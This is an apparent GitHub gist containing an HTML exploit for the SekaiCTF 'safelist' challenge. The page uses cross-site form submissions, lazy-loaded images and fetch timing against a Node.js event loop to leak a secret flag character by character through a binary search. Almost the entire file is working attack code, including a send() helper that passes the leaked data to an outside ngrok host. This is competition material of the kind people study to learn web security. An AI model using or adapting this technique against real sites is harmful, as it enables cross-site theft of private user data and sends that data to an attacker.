safelist-exp.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<!-- | |
The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop. | |
If images are loading, the request to "/" is slower, otherwise faster. | |
By using a well-crafted height, we can let note with "A" load image but note with "Z" not load. | |
We can use fetch to measure the request time. | |
--> | |
<body> | |
<button onclick="run()">start</button> | |
<form id=f action="http://localhost:1234/create" method="POST" target="_blank"> | |
<input id=inp name="text" value=""> | |
</form> | |
<form id=f2 action="http://localhost:1234/remove" method="POST" target="_blank"> | |
<input id=inp2 name="index" value=""> | |
</form> | |
<script> | |
let flag = 'SEKAI{' | |
const TARGET = 'https://safelist.ctf.sekai.team' | |
f.action = TARGET + '/create' | |
f2.action = TARGET + '/remove' | |
const sleep = ms => new Promise(r => setTimeout(r, ms)) | |
const send = data => fetch('http://server.ngrok.io?d='+data) | |
const charset = 'abcdefghijklmnopqrstuvwxyz'.split('') | |
// start exploit | |
let count = 0 | |
setTimeout(async () => { | |
let L = 0 | |
let R = charset.length - 1 | |
while( (R-L)>3 ) { | |
let M = Math.floor((L + R) / 2) | |
let c = charset[M] | |
send('try_' + flag + c) | |
const found = await testChar(flag + c) | |
if (found) { | |
L = M | |
} else { | |
R = M - 1 | |
} | |
} | |
// fallback to linerar since I am not familiar with binary search lol | |
for(let i=R; i>=L; i--) { | |
let c = charset[i] | |
send('try_' + flag + c) | |
const found = await testChar(flag + c) | |
if (found) { | |
send('found: '+ flag+c) | |
flag += c | |
break | |
} | |
} | |
}, 0) | |
async function testChar(str) { | |
return new Promise(resolve => { | |
/* | |
For 3350, you need to test it on your local to get this number. | |
The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold | |
If starts with "A", the image should be loaded because it's in the threshold. | |
*/ | |
inp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('') | |
f.submit() | |
setTimeout(() => { | |
run(str, resolve) | |
}, 500) | |
}) | |
} | |
async function run(str, resolve) { | |
for(let i=1; i<=5;i++) { | |
window.open(TARGET) | |
} | |
let t = 0 | |
const round = 30 | |
setTimeout(async () => { | |
for(let i=0; i<round; i++) { | |
let s = performance.now() | |
await fetch(TARGET + '/?test', { | |
mode: 'no-cors' | |
}).catch(err=>1) | |
let end = performance.now() | |
t += end - s | |
console.log(end - s) | |
} | |
const avg = t/round | |
send(str + "," + t + "," + "avg:" + avg) | |
/* | |
I get this threshold(1000ms) by trying multiple times on remote admin bot | |
for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold | |
*/ | |
const isFound = (t >= 1000) | |
if (isFound) { | |
inp2.value = "0" | |
} else { | |
inp2.value = "1" | |
} | |
// remember to delete the post to not break our leak oracle | |
f2.submit() | |
setTimeout(() => { | |
resolve(isFound) | |
}, 200) | |
}, 200) | |
} | |
</script> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment